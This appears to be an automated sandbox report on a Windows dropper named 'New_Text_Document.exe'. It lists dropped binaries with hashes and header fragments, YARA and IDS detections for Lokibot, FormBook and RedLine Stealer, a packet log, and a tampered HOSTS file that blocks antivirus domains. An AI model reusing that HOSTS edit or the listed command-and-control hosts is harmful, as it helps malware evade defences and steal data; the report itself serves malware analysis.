                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..f............... ........@.. ....................................@.................................0...O...................................x[..p............................................ ............... ..H............text....e... ...f.................. ..`.rsrc................h..............@..@.reloc...............n..............@..B................d.......H...........o......}........d...........................................0..Q.........}.....(.......(......{.....o.......o......{.....(....o......{......(....o.....*2...(.....+.*2...(.....+.*..0..+.........,..{.......+....,...{....o........(.....*..0............s....}.....s....}.....s....}.....s....}.....{....o......( .....{.....^.3s!...o".....{....r...po#.....{.....K..s$...o%.....{.....o&.....{....r...po......{.....o'.....{...........s(...o).....{.......3s!...o".....{....r..
                                                                              Process:C:\Users\user\Desktop\New_Text_Document.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1539072
                                                                              Entropy (8bit):7.965645490174122
                                                                              Encrypted:false
                                                                              SSDEEP:24576:gypNtUs9KsXLybMZg2w1IP09ttAbLtueLA6YCsevGgw72Cob9o:np3hlZq6gAntuec6YvD25b9
                                                                              MD5:56DBEB16231126799330A7757399E5AE
                                                                              SHA1:FF3B170A83A8B745423292AC62DC77D8A0A10EFE
                                                                              SHA-256:CCA5F0490726143A1F62DCC3FD724624FE6F819E1E6D2C106849F34A24618895
                                                                              SHA-512:045B4B8B4ABEE9A63D37E06859A955357B3EA320BF381F57927652CCAE9CE8F49501C5A117E855173C2F1443AC52E52FC5427855A255207BDFD685559215344C
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.................................o.....@...... ......................................@...............................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc...............r..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\New_Text_Document.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):6.053313234098872
                                                                              Encrypted:false
                                                                              SSDEEP:1536:czvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/EqfIzmd:nSHIG6mQwGmfOQd8YhY0/EqUG
                                                                              MD5:F6E91AB67ABB675D4893F49397629D95
                                                                              SHA1:C4A8AF3C409A2FAC0B25A7E9D7C2D5621995C2D4
                                                                              SHA-256:861AC33701D696AA03435C2A6A6985C76EE1A38AB86CAD1C21CDBD15237A35DD
                                                                              SHA-512:4D5249236E18EB24687B3782D88633E132A8BB6769114E9107F3D87AF6B7FFE3E1F17CF62C497D549D72F8062E4F9A73D08E89776CBCB01352E756DCB7211360
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: C:\Users\user\Desktop\a\kung.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: C:\Users\user\Desktop\a\kung.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\Desktop\a\kung.exe, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: C:\Users\user\Desktop\a\kung.exe, Author: unknown
                                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: C:\Users\user\Desktop\a\kung.exe, Author: unknown
                                                                              • Rule: Loki_1, Description: Loki Payload, Source: C:\Users\user\Desktop\a\kung.exe, Author: kevoreilly
                                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: C:\Users\user\Desktop\a\kung.exe, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\Desktop\a\kung.exe, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 100%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x....................K.K.............=2.................................=2.....=2.....Rich............PE..L.....lW.................8...........9.......P....@.......................... .................................................d....................................................................................P..\............................text....6.......8.................. ..`.rdata..`@...P...B...<..............@..@.data...$^...........~..............@....x....... ....... ......................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\New_Text_Document.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):582656
                                                                              Entropy (8bit):7.906705476168155
                                                                              Encrypted:false
                                                                              SSDEEP:12288:yG1tsT0hAbk1Y3qHBTsyyrHJLm3nI8UB6a2Si:D10YAoKgTTyr43
                                                                              MD5:FC8B3A3005CDC80CE19AF33A57010FA8
                                                                              SHA1:B3303EBE7263A55A61E80407706711CA0727E496
                                                                              SHA-256:66E461F8245BE149D5A3826D29C170D5960ADE477BE127C0FE2BC315E26067A3
                                                                              SHA-512:7486F49127AA27C5369361D34D754D95970E653266E4A507D6FA1874D9235D4AEDA9F6424AD1DFA1E68C9E2D961A6CE5088AB38ED241C19ECB0FF457D3222AD0
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 22%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<.T...............0.............".... ........@.. .......................@............@.....................................O............................ ..........p............................................ ............... ..H............text...(.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........o......}....................................................0..Q.........}.....(.......(......{.....o.......o......{.....(....o......{......(....o.....*2...(.....+.*2...(.....+.*..0..+.........,..{.......+....,...{....o........(.....*..0............s....}.....s....}.....s....}.....s....}.....{....o......( .....{.....^.3s!...o".....{....r...po#.....{.....K..s$...o%.....{.....o&.....{....r...po......{.....o'.....{...........s(...o).....{.......3s!...o".....{....r..
                                                                              Process:C:\Users\user\Desktop\New_Text_Document.exe
                                                                              File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):10177592
                                                                              Entropy (8bit):7.963921843123477
                                                                              Encrypted:false
                                                                              SSDEEP:196608:qj3WTTMoCZ632bpr3FGRrOoIXWMLwtxAIu2buwO8+VQfMy2W1Wc3W4aJX:KGTMfZU2FrVGRrOoIXWMLIxAR2bI8jU9
                                                                              MD5:8A22C4B4E8B911A51322DFD78FE799C4
                                                                              SHA1:65A15134C02657E6079C84E2F7902F3D8EE6F8DA
                                                                              SHA-256:5337415A9069931BB4B3C68559D2ED226AFA5E64E9D66165D6A9F65400F259D9
                                                                              SHA-512:03ECCC4C5448A9309B3A81C9D531550E6ECF67CBB071D6FA4DF50597F0C2447A598C7AD1AAEABD4DEA7A88287A0064217D812B9DA09B728D580F74BA84BCA3CA
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 52%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(........2..`..........@....................................J....`... .............................................B...d...........................................................(...(................................................... .........M..................`..` ........Q.j..T..............@... `0............j.............@..@ .......U.....k.............@..@ T............ k.............@..@ @1..........$k................. ....0.......$k.............@... `....@.......&k.............@... .....P.......(k.............@... .....`..>....*k.............@... x....p..v.....k.............@..B.imports.............0k.............@....tls.................2k..................rsrc................4k.............@..@.themida.`T..........<k.............`....boot...
                                                                              Process:C:\Users\user\Desktop\New_Text_Document.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):4096
                                                                              Entropy (8bit):4.236575842178753
                                                                              Encrypted:false
                                                                              SSDEEP:96:D/5pMyGeRB7X1odoToFe7X1odoToFj7XK6PoGiQaqEeiqEspxvS+lh9n8n:LAyGkB7XeWUFe7XeWUFj766PoGvDJ/jS
                                                                              MD5:AD26DE15EB6864FE2019820D1E3A3D1A
                                                                              SHA1:C22C3AB6D2ACB674A8E255234315BF788C22DB49
                                                                              SHA-256:EA56521B6DE5CEF5FB60CE6F48910EB2616718A67C4515B4581C84ACF6621DFE
                                                                              SHA-512:6BE220CA5BD97EC8E22D7AA86E6BCFB38F90F424BF79F0C860D156A557409D7659B4BE775243BF2E87FB2EFC313C5C3F90484A909CB0A3A49CDFC473B7D1D858
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,sG...............0..@...r......._... ...`....@.. ....................................@.................................6_..O....`...n...........................E..p............................................ ............... ..H............text....?... ...@.................. ..`.rsrc....n...`...p...B..............@..@.reloc..............................@..B................j_......H.......t{..0N..............h{............................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*".(.....*R.(.......s....}....*.0............{....o.....+..*....0............{.....o.....+..*...0............{.....o.....+..*...0............{.....o.....+..*...0............{.....o.....+..*R.(.......sG...}....*..0..G........r...p..{....oH.......s....}.....o.....s......{.....o....&.o.......+..*..0..(.......
                                                                              Process:C:\Users\user\Desktop\New_Text_Document.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):935936
                                                                              Entropy (8bit):5.969062045638791
                                                                              Encrypted:false
                                                                              SSDEEP:12288:BgG0oRW829AM9cpSOkCmWQnU4oE0gCB4SFA9xVuZfTm6PtX8qY0xR:Bgx829AocpSOkbHof1xm0Fl8q
                                                                              MD5:167CF482CA11A137E222581148D776DC
                                                                              SHA1:C6767B2A893C0F7B73FF980FEDECFDCF2093876D
                                                                              SHA-256:6FFF71E22472096A9504705DD57BE5306EFE418A44897AFCE0875ABA7822A72F
                                                                              SHA-512:74E80DC56AEDBFBB50CD6C1D7E2919ED028DBF3036589C1F71DCFCC8505541CC77C456D8CEB18DB20EB86387ED260564F641F3FFB140A8D0B06918809F1D09C3
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........._b.._b.._b......Qb.......b......Ib......\b.._b...b......Nb......Jb.......b......^b......^b..Rich_b..........PE..L.....:e..............."..........................@.......................................@.................................."..(............................P...K......8...............................@............ ...............................text............................... ..`.rdata..............................@..@.data........@.......&..............@....idata....... ......................@..@.00cfg.......@......................@..@.reloc..(W...P...X..................@..B................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):55
                                                                              Entropy (8bit):4.306461250274409
                                                                              Encrypted:false
                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                              Malicious:false
                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                              Process:C:\Users\user\Desktop\a\setup.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2810
                                                                              Entropy (8bit):4.262117794073726
                                                                              Encrypted:false
                                                                              SSDEEP:48:vDZhyoZWM9rU5fFcDL6iCW1Ri4q+9rn5w0K:vDZEurK9XiCW1Ri4qun54
                                                                              MD5:4AC8A26E2CEE1347880EDCCB47AB30EA
                                                                              SHA1:A629F6D453014C9DCCB98987E1F4B0A3D4BDD460
                                                                              SHA-256:DE574C85B289F23BBA4B932A4C48397C4C61904CB6DF086726DD7F8049624C3A
                                                                              SHA-512:FC2AF80B2E84AE114AE06144B9EC41EED50250E20F18DB3D114AC8D2C59EBBFCD440F59D12F173EA6A94BCF394B0CECEE9E120265112B7043BF9E2BD636D6A8A
                                                                              Malicious:true
                                                                              Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..
                                                                              Process:C:\Users\user\Desktop\New_Text_Document.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):42
                                                                              Entropy (8bit):4.08924466198827
                                                                              Encrypted:false
                                                                              SSDEEP:3:atTqX4LxNNzABwQA:aJqX4fNzAmQA
                                                                              MD5:B83F363872598066C4E492C40ADF0AD2
                                                                              SHA1:B73F304C769E16F6DF38F4CAA3542E968618277C
                                                                              SHA-256:93AE953D3847FDB9C37F19E41F316637F25913406D482A86E966FFE4B05392F0
                                                                              SHA-512:4CBF9072D471F1AC4D4933A6AF9BF4F56747D3997A6AF115B7F04F16B123DFD032629F5A66696DFADFCB8F4902D531A2996B7E77709A619927F1607C1EA24901
                                                                              Malicious:false
                                                                              Preview:Hello World..The operation has timed out..
                                                                              File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):3.687084186929965
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:New_Text_Document.exe
                                                                              File size:4'608 bytes
                                                                              MD5:a239a27c2169af388d4f5be6b52f272c
                                                                              SHA1:0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
                                                                              SHA256:98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
                                                                              SHA512:f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
                                                                              SSDEEP:48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt
                                                                              TLSH:6991A705B3E84639D1B64B342DB3C3106A76F5459D77838EBCC4131E6D21B645A22FB2
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M.e.............................&... ...@....@.. ....................................@................................
                                                                              Icon Hash:00928e8e8686b000
                                                                              Entrypoint:0x40268e
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows cui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x65184DB9 [Sat Sep 30 16:32:57 2023 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x26380x53.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x500.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x20000x6940x800False0.50439453125data4.248908813851583IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x40000x5000x600False0.3782552083333333data3.7737291032186833IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x60000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_VERSION0x40a00x26cdata0.4532258064516129
                                                                              RT_MANIFEST0x43100x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain
                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              91.227.16.22192.168.2.780497552018572 10/26/23-09:47:51.569829TCP2018572ET TROJAN HTTP Executable Download from suspicious domain with direct request/fake browser (multiple families)804975591.227.16.22192.168.2.7
                                                                              192.168.2.750.116.112.4349723802031412 10/26/23-09:46:38.811863TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972380192.168.2.750.116.112.43
                                                                              77.91.124.86192.168.2.719084497582043234 10/26/23-09:47:52.932361TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response190844975877.91.124.86192.168.2.7
                                                                              192.168.2.73.33.130.19049748802031412 10/26/23-09:47:39.041488TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.73.33.130.190
                                                                              192.168.2.7103.120.80.11149734802031412 10/26/23-09:47:00.169360TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.7103.120.80.111
                                                                              192.168.2.799.83.196.7149739802031412 10/26/23-09:47:14.376373TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.799.83.196.71
                                                                              192.168.2.771.33.141.24849731802031412 10/26/23-09:46:53.938086TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.771.33.141.248
                                                                              192.168.2.723.227.38.7449741802031412 10/26/23-09:47:19.088369TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.723.227.38.74
                                                                              192.168.2.777.91.124.8649758190842043231 10/26/23-09:47:52.728577TCP2043231ET TROJAN Redline Stealer TCP CnC Activity4975819084192.168.2.777.91.124.86
                                                                              192.168.2.777.91.124.8649758190842046045 10/26/23-09:47:52.728577TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)4975819084192.168.2.777.91.124.86
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 26, 2023 09:45:52.685431004 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:52.794337988 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:52.794454098 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:52.794663906 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:52.905519962 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:52.905548096 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:52.905563116 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:52.905601025 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:52.905628920 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:52.905709028 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:52.905713081 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:52.905791044 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:52.905829906 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:52.905873060 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:52.905986071 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:52.906022072 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:52.906030893 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:52.906127930 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:52.906166077 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:53.017652988 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.017680883 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.017693996 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.017707109 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.017740011 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.017785072 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:53.017801046 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.017841101 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.017843962 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:53.017868042 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:53.017940044 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.017987967 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:53.018011093 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.018289089 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.018333912 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:53.018348932 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.018495083 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.018542051 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.018580914 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.018594980 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:53.018625021 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:53.018651962 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.018738985 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.018790007 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:53.018795013 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.018811941 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.018857956 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:53.018884897 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.019124985 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.019172907 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:53.126691103 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.126719952 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.126733065 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.126754999 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.126768112 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.126785994 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.126867056 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:53.126900911 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:53.126915932 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.126987934 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.127033949 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:53.127074957 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.127146006 CEST8049703172.245.208.6192.168.2.7
                                                                              Oct 26, 2023 09:45:53.127191067 CEST4970380192.168.2.7172.245.208.6
                                                                              Oct 26, 2023 09:45:53.127218008 CEST8049703172.245.208.6192.168.2.7
